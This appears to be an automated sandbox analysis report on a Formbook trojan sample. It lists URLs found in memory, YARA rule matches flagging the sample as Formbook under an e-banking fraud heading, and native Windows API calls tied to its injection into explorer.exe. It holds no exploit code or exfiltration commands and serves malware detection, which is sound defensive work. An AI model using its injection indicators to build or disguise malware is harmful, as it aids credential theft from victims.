          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2690919232.00000000097A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com2025-01-10T1
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000000.1716978522.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.comatio
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A

          E-Banking Fraud

          Source: Yara match; File source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: TU0kiz3mxz.exe PID: 1928, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: TU0kiz3mxz.exe PID: 1148, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: explorer.exe PID: 3584, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_0041A320 NtCreateFile
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_0041A3D0 NtReadFile
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_0041A450 NtClose
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_0041A500 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_0041A44B NtClose
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_0041A4FB NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102B60 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102D30 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102F90 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102FB0 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102E80 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01104340 NtSetContextThread
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01104650 NtSuspendThread
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102B80 NtQueryInformationFile
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102BA0 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102BE0 NtQueryValueKey
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102AB0 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102AF0 NtWriteFile
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102D00 NtSetInformationFile
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102DB0 NtEnumerateKey
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102C00 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102C60 NtCreateKey
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102CC0 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102CF0 NtOpenProcess
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102F60 NtCreateProcessEx
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102FA0 NtQuerySection
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102E30 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01102EE0 NtQueueApcThread
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01103010 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01103090 NtSetValueKey
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_011035C0 NtCreateMutant
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_011039B0 NtGetContextThread
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01103D10 NtOpenProcessToken
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe; Code function: 3_2_01103D70 NtOpenThread
          Source: C:\Windows\explorer.exe; Code function: 4_2_0E910E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe; Code function: 4_2_0E90F232 NtCreateFile
          Source: C:\Windows\explorer.exe; Code function: 4_2_0E910E0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22C60 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22BE0 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C235C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C24650 NtSuspendThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C24340 NtSetContextThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C22BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C23090 NtSetValueKey
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C23010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C23D70 NtOpenThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C23D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04C239B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_0296A3D0 NtReadFile
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_0296A320 NtCreateFile
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_0296A450 NtClose
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_0296A500 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_0296A4FB NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_0296A44B NtClose
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04AAA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04AA9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04AAA042 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\explorer.exe; Code function: 5_2_04AA9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF07705_2_04BF0770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C820005_2_04C82000
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA81CC5_2_04CA81CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CB01AA5_2_04CB01AA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA41A25_2_04CA41A2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C781585_2_04C78158
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE01005_2_04BE0100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8A1185_2_04C8A118
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C702C05_2_04C702C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C902745_2_04C90274
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CB03E65_2_04CB03E6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFE3F05_2_04BFE3F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAA3525_2_04CAA352
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE0CF25_2_04BE0CF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C90CB55_2_04C90CB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF0C005_2_04BF0C00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BEADE05_2_04BEADE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C08DBF5_2_04C08DBF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFAD005_2_04BFAD00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8CD1F5_2_04C8CD1F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAEEDB5_2_04CAEEDB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C02E905_2_04C02E90
